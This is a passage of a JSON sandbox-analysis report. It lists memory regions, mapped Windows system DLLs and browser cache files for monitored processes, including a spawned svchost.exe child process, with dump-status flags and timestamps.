"ref_process_dump": null, "size": 4096, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1052671, "entry_point": 1048576, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_2938", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 1048576, "timestamp": "00:05:12.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1122303, "entry_point": 0, "filename": null, "id": "region_2939", "name": "pagefile_0x0000000000110000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1114112, "timestamp": "00:05:12.995", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1052671, "entry_point": 0, "filename": null, "id": "region_2940", "name": "pagefile_0x0000000000100000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1048576, "timestamp": "00:05:12.997", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1967652864, "type": "region", "version": 1 }, "end_va": 1967697919, "entry_point": 1967652864, "filename": "\\Windows\\SysWOW64\\profapi.dll", "id": "region_2941", "name": "profapi.dll", "norm_filename": "c:\\windows\\syswow64\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1967652864, "timestamp": "00:05:13.000", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1183743, "entry_point": 0, "filename": null, "id": "region_2942", "name": "private_0x0000000000120000", "norm_filename": null, "region_type": "private_memory", "start_va": 1179648, "timestamp": "00:05:13.003", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 49152, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1294335, "entry_point": 1245184, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat", "id": "region_2943", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 1245184, "timestamp": "00:05:13.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1343487, "entry_point": 1310720, "filename": "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat", "id": "region_2944", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat", "region_type": "memory_mapped_file", "start_va": 1310720, "timestamp": "00:05:13.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1441791, "entry_point": 1376256, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat", "id": "region_2945", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 1376256, "timestamp": "00:05:13.022", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1245183, "entry_point": 1179648, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat", "id": "region_2983", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 1179648, "timestamp": "00:05:13.072", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 196608, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1572863, "entry_point": 0, "filename": null, "id": "region_2995", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:05:13.104", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1967456256, "type": "region", "version": 1 }, "end_va": 1967591423, "entry_point": 1967456256, "filename": "\\Windows\\SysWOW64\\ntmarta.dll", "id": "region_3008", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\syswow64\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1967456256, "timestamp": "00:05:13.155", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 1989148672, "type": "region", "version": 1 }, "end_va": 1989431295, "entry_point": 1989148672, "filename": "\\Windows\\SysWOW64\\Wldap32.dll", "id": "region_3009", "name": "wldap32.dll", "norm_filename": "c:\\windows\\syswow64\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 1989148672, "timestamp": "00:05:13.156", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 2004746240, "type": "region", "version": 1 }, "end_va": 2004963327, "entry_point": 2004746240, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_3010", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 2004746240, "timestamp": "00:05:13.157", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1988034560, "type": "region", "version": 1 }, "end_va": 1988059135, "entry_point": 1988034560, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_3011", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1988034560, "timestamp": "00:05:13.157", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1966080, "start_va": 43581440, "type": "region", "version": 1 }, "end_va": 45547519, "entry_point": 0, "filename": null, "id": "region_3012", "name": "private_0x0000000002990000", "norm_filename": null, "region_type": "private_memory", "start_va": 43581440, "timestamp": "00:05:13.158", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 278528, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967407103, "entry_point": 1967128576, "filename": "\\Windows\\SysWOW64\\dnsapi.dll", "id": "region_3037", "name": "dnsapi.dll", "norm_filename": "c:\\windows\\syswow64\\dnsapi.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:05:13.206", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 393216, "start_va": 2949120, "type": "region", "version": 1 }, "end_va": 3342335, "entry_point": 0, "filename": null, "id": "region_3038", "name": "private_0x00000000002d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2949120, "timestamp": "00:05:13.210", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 1969946624, "type": "region", "version": 1 }, "end_va": 1970061311, "entry_point": 1969946624, "filename": "\\Windows\\SysWOW64\\IPHLPAPI.DLL", "id": "region_3039", "name": "iphlpapi.dll", "norm_filename": "c:\\windows\\syswow64\\iphlpapi.dll", "region_type": "memory_mapped_file", "start_va": 1969946624, "timestamp": "00:05:13.211", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1970143232, "type": "region", "version": 1 }, "end_va": 1970171903, "entry_point": 1970143232, "filename": "\\Windows\\SysWOW64\\winnsi.dll", "id": "region_3040", "name": "winnsi.dll", "norm_filename": "c:\\windows\\syswow64\\winnsi.dll", "region_type": "memory_mapped_file", "start_va": 1970143232, "timestamp": "00:05:13.211", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 43581440, "type": "region", "version": 1 }, "end_va": 44630015, "entry_point": 0, "filename": null, "id": "region_3041", "name": "private_0x0000000002990000", "norm_filename": null, "region_type": "private_memory", "start_va": 43581440, "timestamp": "00:05:13.212", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 45285376, "type": "region", "version": 1 }, "end_va": 45547519, "entry_point": 0, "filename": null, "id": "region_3042", "name": "private_0x0000000002b30000", "norm_filename": null, "region_type": "private_memory", "start_va": 45285376, "timestamp": "00:05:13.212", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1380351, "entry_point": 0, "filename": null, "id": "region_3043", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:05:13.219", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 41746432, "type": "region", "version": 1 }, "end_va": 42008575, "entry_point": 0, "filename": null, "id": "region_3045", "name": "private_0x00000000027d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 41746432, "timestamp": "00:05:13.242", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 44630016, "type": "region", "version": 1 }, "end_va": 44892159, "entry_point": 0, "filename": null, "id": "region_3046", "name": "private_0x0000000002a90000", "norm_filename": null, "region_type": "private_memory", "start_va": 44630016, "timestamp": "00:05:13.242", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1966997504, "type": "region", "version": 1 }, "end_va": 1967091711, "entry_point": 1966997504, "filename": "\\Windows\\SysWOW64\\userenv.dll", "id": "region_3047", "name": "userenv.dll", "norm_filename": "c:\\windows\\syswow64\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 1966997504, "timestamp": "00:05:13.242", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 1990459392, "type": "region", "version": 1 }, "end_va": 1990643711, "entry_point": 1990459392, "filename": "\\Windows\\SysWOW64\\wintrust.dll", "id": "region_3049", "name": "wintrust.dll", "norm_filename": "c:\\windows\\syswow64\\wintrust.dll", "region_type": "memory_mapped_file", "start_va": 1990459392, "timestamp": "00:05:13.244", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 237568, "start_va": 1966735360, "type": "region", "version": 1 }, "end_va": 1966972927, "entry_point": 1966735360, "filename": "\\Windows\\SysWOW64\\schannel.dll", "id": "region_3050", "name": "schannel.dll", "norm_filename": "c:\\windows\\syswow64\\schannel.dll", "region_type": "memory_mapped_file", "start_va": 1966735360, "timestamp": "00:05:13.248", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 35061760, "type": "region", "version": 1 }, "end_va": 35323903, "entry_point": 0, "filename": null, "id": "region_3051", "name": "private_0x0000000002170000", "norm_filename": null, "region_type": "private_memory", "start_va": 35061760, "timestamp": "00:05:13.252", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 46137344, "type": "region", "version": 1 }, "end_va": 46399487, "entry_point": 0, "filename": null, "id": "region_3052", "name": "private_0x0000000002c00000", "norm_filename": null, "region_type": "private_memory", "start_va": 46137344, "timestamp": "00:05:13.252", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130280448, "type": "region", "version": 1 }, "end_va": 2130292735, "entry_point": 0, "filename": null, "id": "region_3053", "name": "private_0x000000007ef98000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130280448, "timestamp": "00:05:13.252", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 1966342144, "type": "region", "version": 1 }, "end_va": 1966678015, "entry_point": 1966342144, "filename": "\\Windows\\SysWOW64\\rasapi32.dll", "id": "region_3054", "name": "rasapi32.dll", "norm_filename": "c:\\windows\\syswow64\\rasapi32.dll", "region_type": "memory_mapped_file", "start_va": 1966342144, "timestamp": "00:05:13.256", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 1966211072, "type": "region", "version": 1 }, "end_va": 1966297087, "entry_point": 1966211072, "filename": "\\Windows\\SysWOW64\\rasman.dll", "id": "region_3055", "name": "rasman.dll", "norm_filename": "c:\\windows\\syswow64\\rasman.dll", "region_type": "memory_mapped_file", "start_va": 1966211072, "timestamp": "00:05:13.262", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1970077696, "type": "region", "version": 1 }, "end_va": 1970130943, "entry_point": 1970077696, "filename": "\\Windows\\SysWOW64\\rtutils.dll", "id": "region_3056", "name": "rtutils.dll", "norm_filename": "c:\\windows\\syswow64\\rtutils.dll", "region_type": "memory_mapped_file", "start_va": 1970077696, "timestamp": "00:05:13.268", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1380351, "entry_point": 0, "filename": null, "id": "region_3058", "name": "pagefile_0x0000000000150000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1376256, "timestamp": "00:05:13.274", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1969881088, "type": "region", "version": 1 }, "end_va": 1969905663, "entry_point": 1969881088, "filename": "\\Windows\\SysWOW64\\SensApi.dll", "id": "region_3059", "name": "sensapi.dll", "norm_filename": "c:\\windows\\syswow64\\sensapi.dll", "region_type": "memory_mapped_file", "start_va": 1969881088, "timestamp": "00:05:13.279", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1966145536, "type": "region", "version": 1 }, "end_va": 1966211071, "entry_point": 1966145536, "filename": "\\Windows\\SysWOW64\\nlaapi.dll", "id": "region_3060", "name": "nlaapi.dll", "norm_filename": "c:\\windows\\syswow64\\nlaapi.dll", "region_type": "memory_mapped_file", "start_va": 1966145536, "timestamp": "00:05:13.288", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1769472, "start_va": 46399488, "type": "region", "version": 1 }, "end_va": 48168959, "entry_point": 0, "filename": null, "id": "region_3061", "name": "private_0x0000000002c40000", "norm_filename": null, "region_type": "private_memory", "start_va": 46399488, "timestamp": "00:05:13.290", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 720896, "start_va": 46399488, "type": "region", "version": 1 }, "end_va": 47120383, "entry_point": 0, "filename": null, "id": "region_3062", "name": "private_0x0000000002c40000", "norm_filename": null, "region_type": "private_memory", "start_va": 46399488, "timestamp": "00:05:13.290", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 48103424, "type": "region", "version": 1 }, "end_va": 48168959, "entry_point": 0, "filename": null, "id": "region_3063", "name": "private_0x0000000002de0000", "norm_filename": null, "region_type": "private_memory", "start_va": 48103424, "timestamp": "00:05:13.290", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 720896, "start_va": 47120384, "type": "region", "version": 1 }, "end_va": 47841279, "entry_point": 0, "filename": null, "id": "region_3064", "name": "private_0x0000000002cf0000", "norm_filename": null, "region_type": "private_memory", "start_va": 47120384, "timestamp": "00:05:13.291", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 46465024, "type": "region", "version": 1 }, "end_va": 46727167, "entry_point": 0, "filename": null, "id": "region_3065", "name": "private_0x0000000002c50000", "norm_filename": null, "region_type": "private_memory", "start_va": 46465024, "timestamp": "00:05:13.299", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 47054848, "type": "region", "version": 1 }, "end_va": 47120383, "entry_point": 0, "filename": null, "id": "region_3066", "name": "private_0x0000000002ce0000", "norm_filename": null, "region_type": "private_memory", "start_va": 47054848, "timestamp": "00:05:13.299", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 47513600, "type": "region", "version": 1 }, "end_va": 47775743, "entry_point": 0, "filename": null, "id": "region_3067", "name": "private_0x0000000002d50000", "norm_filename": null, "region_type": "private_memory", "start_va": 47513600, "timestamp": "00:05:13.299", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130268160, "type": "region", "version": 1 }, "end_va": 2130280447, "entry_point": 0, "filename": null, "id": "region_3068", "name": "private_0x000000007ef95000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130268160, "timestamp": "00:05:13.299", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1966080000, "type": "region", "version": 1 }, "end_va": 1966104575, "entry_point": 1966080000, "filename": "\\Windows\\SysWOW64\\rasadhlp.dll", "id": "region_3069", "name": "rasadhlp.dll", "norm_filename": "c:\\windows\\syswow64\\rasadhlp.dll", "region_type": "memory_mapped_file", "start_va": 1966080000, "timestamp": "00:05:13.303", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1445887, "entry_point": 0, "filename": null, "id": "region_3070", "name": "pagefile_0x0000000000160000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1441792, "timestamp": "00:05:13.307", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 45744128, "type": "region", "version": 1 }, "end_va": 46006271, "entry_point": 0, "filename": null, "id": "region_3071", "name": "private_0x0000000002ba0000", "norm_filename": null, "region_type": "private_memory", "start_va": 45744128, "timestamp": "00:05:13.307", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 46792704, "type": "region", "version": 1 }, "end_va": 47054847, "entry_point": 0, "filename": null, "id": "region_3072", "name": "private_0x0000000002ca0000", "norm_filename": null, "region_type": "private_memory", "start_va": 46792704, "timestamp": "00:05:13.307", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1979842560, "type": "region", "version": 1 }, "end_va": 1980379135, "entry_point": 1979842560, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_3073", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1979842560, "timestamp": "00:05:13.307", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130255872, "type": "region", "version": 1 }, "end_va": 2130268159, "entry_point": 0, "filename": null, "id": "region_3074", "name": "private_0x000000007ef92000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130255872, "timestamp": "00:05:13.307", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs", "filename": "c:\\windows\\syswow64\\svchost.exe", "id": "proc_17", "image_name": "svchost.exe", "monitor_reason": "child_process", "monitored_id": 17, "origin_monitor_id": 15, "ref_parent_process": { "ref_id": "proc_15", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_2890", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:05:12.966", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_2891", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:05:12.966", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_2892", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:05:12.966", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_2893", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:05:12.966", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_2894", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:05:12.966", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 573439, "entry_point": 0, "filename": null, "id": "region_2895", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:05:12.966", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2293759, "entry_point": 0, "filename": null, "id": "region_2896", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:05:12.966", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2490368, "type": "region", "version": 1 }, "end_va": 2752511, "entry_point": 0, "filename": null, "id": "region_2897", "name": "private_0x0000000000260000", "norm_filename": null, "region_type": "private_memory", "start_va": 2490368, "timestamp": "00:05:12.966", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 9830400, "type": "region", "version": 1 }, "end_va": 9863167, "entry_point": 9830400, "filename": "\\Windows\\SysWOW64\\svchost.exe", "id": "region_2898", "name": "svchost.exe", "norm_filename": "c:\\windows\\syswow64\\svchost.exe", "region_type": "memory_mapped_file", "start_va": 9830400, "timestamp": "00:05:12.966", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2007826432, "type": "region", "version": 1 }, "end_va": 2009567231, "entry_point": 2007826432, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_2899", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2007826432, "timestamp": "00:05:12.966", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], 